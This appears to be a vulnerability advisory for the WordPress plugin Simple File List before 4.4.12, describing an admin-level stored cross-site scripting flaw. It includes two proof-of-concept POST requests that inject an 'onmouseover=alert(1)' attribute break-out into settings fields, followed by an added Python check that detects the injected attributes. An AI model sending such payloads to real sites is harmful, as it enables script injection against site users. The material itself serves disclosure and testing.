wpexploit
Raad Haddad of Cloudyrion GmbH
WPEX-ID:B57272EA-9A8A-482A-BBAA-5F202CA5B9AA
Sep 19, 2022 - 12:00 a.m.

Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting


EPSS: 0.001 (Low), percentile 25.0%

The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in a multisite setup).

# First Stored XSS - HTTP Request

POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=email_settings HTTP/1.1
Host: target
...
...

eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Demail_settings&eeNotifyTo=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyCc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyBcc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFrom=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFromName=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifySubject=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyMessage=Greetings%2C%0D%0A%0D%0AYou+should+know+that+a+file+has+been+uploaded+to+your+website.%0D%0A%0D%0A%5Bfile-list%5D%0D%0A%0D%0AFile+List%3A+%5Bweb-page%5D&submit=SAVE

+++++++++++++++++++++++

# Second Stored XSS - HTTP Request

POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=list_settings HTTP/1.1
Host: target
...
...

eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Dlist_settings&eeShowList=YES&eeSortBy=DateMod&eeSortOrder=Descending&eeGenerateImgThumbs=YES&eeShowFileThumb=YES&eeLabelThumb=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeLabelName=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileDate=YES&eeLabelDate=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileSize=YES&eeLabelSize=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowHeader=YES&eeSmoothScroll=YES&eeShowFileDescription=YES&eeShowFileExtension=YES&eeShowFileActions=YES&eeShowFileOpen=YES&eeShowFileDownload=YES&eeShowFileCopyLink=YES&submit=SAVE
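
The attribute break-out that both requests rely on, shown as a regression check a reviewer can run against rendered settings markup. This is an added example, not the plugin's code or the reporter's. The `<input ... value="">` template is an assumption about how a settings form echoes a stored value, and the `eeNotifySubject` value is constructed as a benign control.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Two fields copied from the first request on this page (still URL-encoded),
# plus one constructed benign value for contrast.
BODY = (
    "eeNotifyTo=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a"
    "&eeNotifyFromName=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a"
    "&eeNotifySubject=File+uploaded"
)


class AttrAudit(HTMLParser):
    """Collect the attribute names seen on every <input> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs.append([name for name, _ in attrs])


def render(name, value, escaped):
    # Assumed template: the stored setting is echoed into value="...".
    shown = escape(value, quote=True) if escaped else value
    return f'<input type="text" name="{name}" value="{shown}">'


def injected_attributes(html):
    """Return attributes beyond the three the template itself emits."""
    audit = AttrAudit()
    audit.feed(html)
    expected = {"type", "name", "value"}
    return [a for attrs in audit.attrs for a in attrs if a not in expected]


def audit_settings(body, escaped):
    """Map each submitted field to the extra attributes its value creates."""
    return {
        name: injected_attributes(render(name, value, escaped))
        for name, value in parse_qsl(body)
    }
```

Without escaping, the double quote in the stored value closes `value` and the parser reports extra attributes on the tag. With attribute escaping, the same stored value stays inside `value`.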
